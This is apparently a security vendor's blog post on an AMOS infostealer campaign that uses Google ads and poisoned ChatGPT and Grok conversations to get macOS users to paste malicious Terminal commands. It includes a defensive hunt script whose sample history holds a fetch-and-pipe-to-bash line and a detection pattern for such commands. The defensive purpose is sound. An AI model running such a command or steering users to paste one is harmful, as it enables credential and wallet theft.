A new campaign by the AMOS infostealer is exploiting Google search ads to redirect users to supposedly “helpful” guides hosted in public conversations on Grok and ChatGPT. Although they appear to offer legitimate solutions for macOS, these instructions lead users to execute commands that ultimately install the AMOS malware on their devices.
The activity was initially identified by Kaspersky researchers and later expanded upon in a technical analysis published by Huntress’s managed security team.
This method, known as ClickFix, is triggered when a potential victim searches for common macOS-related terms, such as maintenance questions, troubleshooting issues, or queries about Atlas, OpenAI’s AI browser for macOS. From there, attackers exploit users' trust in AI platforms and Google’s sponsored results to steer them toward downloading the malware.
At TecnetOne, we stay on top of these emerging malware campaigns to provide you with updated recommendations, best practices, and expert cybersecurity guidance, helping you keep your devices and data fully protected.
The malicious Google ad directs users straight to public conversations on ChatGPT and Grok that were strategically crafted to carry out the attack. Although they are hosted on legitimate language model platforms, these conversations contain manipulated instructions that lead unsuspecting users to install malware on their own devices.
Malicious ChatGPT and Grok conversations
During the analysis, researchers were able to reproduce these manipulated results using multiple variations of common searches such as “how to delete data on iMac,” “erase system data on iMac,” or “free up storage on Mac.” This confirms that it’s not an isolated incident, but rather a widespread poisoning campaign targeting typical macOS maintenance and troubleshooting queries.
When a user falls into the trap and runs the commands suggested by the AI conversation in the macOS Terminal, the command decodes a Base64-encoded URL and launches a malicious bash script fetched from it. This script displays a fake dialog box prompting the user to enter their system password, which gives the attacker what is needed to proceed with the malware installation.
Bash Script (Source: Huntress)
Once the user enters their password, the script verifies and stores it to perform actions with elevated privileges. This allows the attacker to download the AMOS infostealer and run it with root-level permissions, granting full control over the compromised system.
AMOS was first identified in April 2023 as a malware-as-a-service (MaaS) operation specifically targeting macOS systems. This model allows attackers to subscribe to the infostealer for a monthly fee of around $1,000, gaining access to a suite of advanced information-stealing tools.
Over time, AMOS has evolved. Earlier this year, it incorporated a backdoor module, enabling operators to remotely execute commands on compromised devices, log keystrokes, and deploy additional malicious payloads based on their objectives.
Once installed, AMOS hides in the /Users/$USER/ directory as a hidden file named .helper. From there, it scans the system, paying particular attention to applications such as Ledger Wallet and Trezor Suite.
If it detects these tools, it replaces them with trojanized versions designed to trick the victim into entering their seed phrase or recovery phrase under the guise of a supposed “security verification.”
Replacement of cryptocurrency wallet apps with trojanized versions
AMOS extends its reach beyond specific apps and also targets cryptocurrency wallets such as Electrum, Exodus, MetaMask, Ledger Live, Coinbase Wallet, and other similar solutions. Additionally, it extracts sensitive browser data, including cookies, stored passwords, autofill information, and session tokens.
The malware also attempts to access credentials stored in the macOS Keychain, such as app and Wi-Fi network passwords, along with local files that may contain valuable information for attackers.
To ensure persistence on the system, AMOS uses a LaunchDaemon (com.finder.helper.plist) that runs a hidden AppleScript functioning as a watchdog mechanism. This process automatically restarts the malware within a second if it is terminated, ensuring its continued presence.
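The following hunt script is an added example, not code from the article, Huntress or Kaspersky. It checks for the three observables the article describes: the hidden .helper file in the home directory, the com.finder.helper.plist LaunchDaemon, and a pasted Terminal command that base64-decodes something and pipes the result into a shell. The sample home directory, daemon directory and shell history it runs against are constructed for demonstration.

```shell
#!/bin/sh
# Added example (not from the article, Huntress or Kaspersky): hunt for the
# indicators named in the article. The .helper path and the LaunchDaemon name
# come from the article; the sample directories and history are constructed.
set -e

# Prints one "HIT: ..." line per indicator found and a final "count: N" line.
# Args: home directory, LaunchDaemons directory, shell history file.
check_amos_indicators() {
  home="$1"; daemons="$2"; history="$3"; hits=0
  # 1. Hidden payload dropped into the user's home directory as .helper
  if [ -e "$home/.helper" ]; then
    echo "HIT: hidden file $home/.helper"; hits=$((hits + 1))
  fi
  # 2. Persistence via the watchdog LaunchDaemon plist
  if [ -e "$daemons/com.finder.helper.plist" ]; then
    echo "HIT: LaunchDaemon $daemons/com.finder.helper.plist"; hits=$((hits + 1))
  fi
  # 3. A pasted ClickFix command: base64-decode, then pipe the result into a shell
  if [ -r "$history" ] &&
     grep -Eq 'base64[[:space:]]+(-d|-D|--decode).*\|[[:space:]]*(ba|z)?sh' "$history"; then
    echo "HIT: base64-decode-to-shell command in $history"; hits=$((hits + 1))
  fi
  echo "count: $hits"
}

# Constructed sample layout standing in for /Users/$USER and /Library/LaunchDaemons
SAMPLE_ROOT=$(mktemp -d)
SAMPLE_HOME="$SAMPLE_ROOT/home"; SAMPLE_DAEMONS="$SAMPLE_ROOT/LaunchDaemons"
mkdir -p "$SAMPLE_HOME" "$SAMPLE_DAEMONS" "$SAMPLE_ROOT/clean"
touch "$SAMPLE_HOME/.helper" "$SAMPLE_DAEMONS/com.finder.helper.plist"
# Constructed history: one benign line and one line shaped like the pasted command
cat > "$SAMPLE_HOME/.zsh_history" <<'EOF'
ls -la ~/Library
curl -fsSL "$(echo PLACEHOLDER_BASE64 | base64 -d)" | bash
EOF

# Run against the constructed sample, then against an empty location
check_amos_indicators "$SAMPLE_HOME" "$SAMPLE_DAEMONS" "$SAMPLE_HOME/.zsh_history"
check_amos_indicators "$SAMPLE_ROOT/clean" "$SAMPLE_ROOT/clean" "$SAMPLE_ROOT/clean/none"
```

On a real Mac the same function is called as `check_amos_indicators "$HOME" /Library/LaunchDaemons "$HOME/.zsh_history"`; a hit on the history check alone means the command was typed, not that the download succeeded, so treat it as a trigger to inspect the other two indicators.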
The recent attacks using the ClickFix technique highlight how threat actors are continuously experimenting with new strategies to exploit legitimate and widely used platforms, including generative AI technologies like those from OpenAI and X.
In fact, a telling detail observed during testing is that when asking ChatGPT to validate the safety of these manipulated instructions, the model itself warns that they are unsafe to execute—demonstrating the importance of always verifying the legitimacy of such commands.
At TecnetOne, we strongly advise exercising caution in light of this new macOS malware campaign: avoid running commands found online or generated by AI without understanding what they do, always verify the legitimacy of links and ads before clicking, keep your operating system and apps up to date, use trusted security solutions that can detect infostealers like AMOS, and never share sensitive information such as your seed phrase.
If you’re ever in doubt, consult a cybersecurity expert to avoid compromising your device.